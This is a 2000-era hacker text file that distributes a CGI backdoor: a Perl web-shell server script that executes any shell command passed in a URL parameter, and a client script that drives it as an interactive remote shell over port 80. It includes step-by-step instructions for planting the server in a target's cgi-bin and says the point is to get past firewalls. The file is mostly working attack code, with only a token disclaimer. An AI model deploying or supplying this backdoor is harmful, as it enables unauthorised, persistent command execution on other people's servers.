CGIbackdoor by hypoclear of lUSt - (Linux Users Strike Today) - 06/09/00

This file includes two PERL scripts:  backdoorserver and backdoorclient

This backdoor is very versitile because most firewalls do not block port 80, 
hence you can use this to backdoor a server on the unfortunate end of a firewall.

I think a trained monkey can set this thing up, but just in case, I'll walk the newbies
through the setup.

To set this thing up first cut these two scripts and paste then into two different
files.  Then 'chmod 755' both of them so they are executable.  Then put the server
file into the cgi-bin directory of the server you want to backdoor (or any other
directory that is web accessable and cgi scripts can execute in).  Then in the client
file one line needs to be edited.  The line which says: my $basedir = "";  
change to read: my $basedir = "/cgi-bin/webpath/to/server/program/server_program_name";

Now run the thing:  usage: ./backdoorclient -h <back_doored_host>

This has been tested on an IRIX 5.3 box as well as a RedHat 6.0 box.
The client part seems to run on a Windows machine, however, the server as of
now does not (at least on mine).

Any questions, comments, concerns, and especially any bugs reports or improvements
that you would like to see.  Feel free to contact me by email at hypoclear@jungle.net.
Please do not bug me that the files aren't working.  All email of this nature will be 
discarded.  However if a genuine bug is found, as I just said, feel free to contact me.
Visit my new homepage: hypoclear.cjb.net

On a final note I would like to add that I am NOT responsible for any harm done with 
these programs.  The only servers you backdoor should be owned by you unless you have
expressed permission to do so.

 
---start cut backdoorclient---

#!/usr/bin/perl

# Backdoor over CGI Client 
# Coded by hypoclear of lUSt (Linux Users Strike Today)
#
# usage: ./backdoorclient -h <back_doored_host>

use IO::Socket; use Getopt::Std;
getopts('h:');

my $basedir = "";    #add full webpath here to server part, including filename
my $request;
my $past = "";
my $temp = "";
my $host = $opt_h;

if (defined $opt_h) {

while ($request ne "exit")
  {
  print "$host\$ ";

  $request = <STDIN>;
  chomp ($request);
  $request =~ s/ /%20/g; 
  $request =~ s/;/%3b/g;

  if ($request eq "exit") {print "logout\n"; last;}
  print "\n";

  if ($request eq "cd"){$past=""}
  else{($temp)=split(/%20/,$request);
    if ($temp eq "cd")
      {$past=$past.$request."%3b";
      $request=$past;}
    else{$request=$past.$request;}
    $request = "echo\"\"\%3b".$request;}

  $remote=IO::Socket::INET->new(Proto =>"tcp",
    PeerAddr => $host,
    PeerPort => "http(80)",);

  unless ($remote) {die "can't connect to $host"}
  $remote->autoflush(1);

  print $remote "GET $basedir?command=$request HTTP/1.0\n\n";
  while (<$remote>) 
    {unless ((/<*>/)||
      (/HTTP\/1.*/)||
      (/Date:*/)||
      (/Server:*/)||
      (/Content-type:*/)||
      (/Content-Type:*/)||
      (/Connection:*/))
      {print}}
  print "\n";
  -close $remote;
  }
}
else{die "\nCGI Backdoor by hypoclear\n(Linux Users Strike Today)\n
usage: ./backdoorclient -h <host>\n\n";}


---end cut backdoorclient---


---start cut backdoorserver---

#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html("");
if (param()){my $command = param("command"); 
  $command=`$command`; print p("$command\n");}
else {print start_form(); textfield("command");}
print end_html;

---end cut backdoorserver---